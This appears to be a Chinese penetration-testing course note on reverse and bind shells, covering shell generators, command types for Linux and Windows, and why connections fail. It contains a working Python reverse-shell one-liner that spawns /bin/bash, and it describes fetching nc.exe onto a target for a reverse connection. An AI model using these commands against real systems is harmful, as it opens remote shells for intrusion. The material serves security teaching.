009-基础入门-不回显不出网&演示环境&源码项目等

反弹Shell

在线生成:

https://sec.lintstar.top/

https://www.revshells.com/

https://forum.ywhack.com/shell.php

实操1 Linux-->Windows:

使用网站Online - Reverse Shell Generator

对于windows监听:

对于Linux进行反弹shell:

问题1:

为什么使用(python环境已有)

复制代码
python3 -c 'import os,pty,socket;s=socket.socket();s.connect(("127.0.0.1",6666));[os.dup2(s.fileno(),f)for f in(0,1,2)];pty.spawn("/bin/bash")'

云服务器widows(监听机)连接不上本地自己的windows(反向连接)

原因:

python版本差异,语法问题

命令类型:

1.系统自带:系统支持的系统命令调用
Bash -i,nc,curl,rustcat,openssl,telnet

2.开发语言:系统环境变量开发环境

perl,php,ruby

3.第三方项目

MSFVenom ,Hoaxshell

4.正反向类别

Reverse反向 Bind绑定等

问题2:

正向连接(先将自己绑定)

讲课电脑直接连接:

为什么不使用反向链接:

因为只能找到网关(下面有手机等设备),必须要有个中间代理才行

实操2:windows-->linux:

总结:

1、Windows上基本就PowerShell命令可以反弹,再就是环境变量的开发语言

2、Linux上默认自带的nc(ncat),系统命令,开发语言等基本大部分都可反弹

实操3:

windows上远程下载Ubuntu上准备好的nc.exe

下载好后可以进行反向连接:

连接不上原因:

1.有时候反向连接不起可能是因为漏洞对于url是post提交还是get提交有了限制,get有限制,post可以全部提交

2.符号有限制

回显出来就没有那么多:(封装成php让别人下载)

封装教程:

#渗透命令

在线参考:

https://book.shentoushi.top/

文件下载:

https://forum.ywhack.com/bountytips.php?download

相关推荐
treesforest16 天前
AI安全系统如何识别异常访问?IP风险识别正在成为关键能力
网络·人工智能·tcp/ip·安全·web安全
上海云盾第一敬业销售16 天前
深入解析WAF的工作原理与机制
web安全·ddos
憧憬成为web高手16 天前
l33t-hoster
学习·web安全·网络安全
HackTwoHub16 天前
Sqli-Scanner SQL注入SKILL自动化挖掘SQL注入,零依赖自动化SQL注入挖掘,赏金猎人
数据库·人工智能·sql·web安全·网络安全·自动化·系统安全
zhengfei61116 天前
小白级手册——全面剖析红队信息收集思考
网络·安全·web安全
爱网络爱Linux16 天前
网络安全与渗透测试实用工具大全
web安全·网络安全·信息安全·cisp-pte·cisp·cissp
持敬chijing16 天前
Web渗透之SQL注入-常用sql语句
sql·安全·web安全·网络安全
顾凌陵16 天前
Web安全二阶段综合测试:知识点速查与实战技巧
安全·web安全
Chengbei1116 天前
AISec真正拟人化全自动渗透工具!支持浏览器交互全自动化挖掘,SQL注入、XSS、越权等。
sql·安全·web安全·网络安全·自动化·系统安全·xss
AI784017 天前
安全左移:网络安全从“亡羊补牢”走向“未雨绸缪”
网络·安全·web安全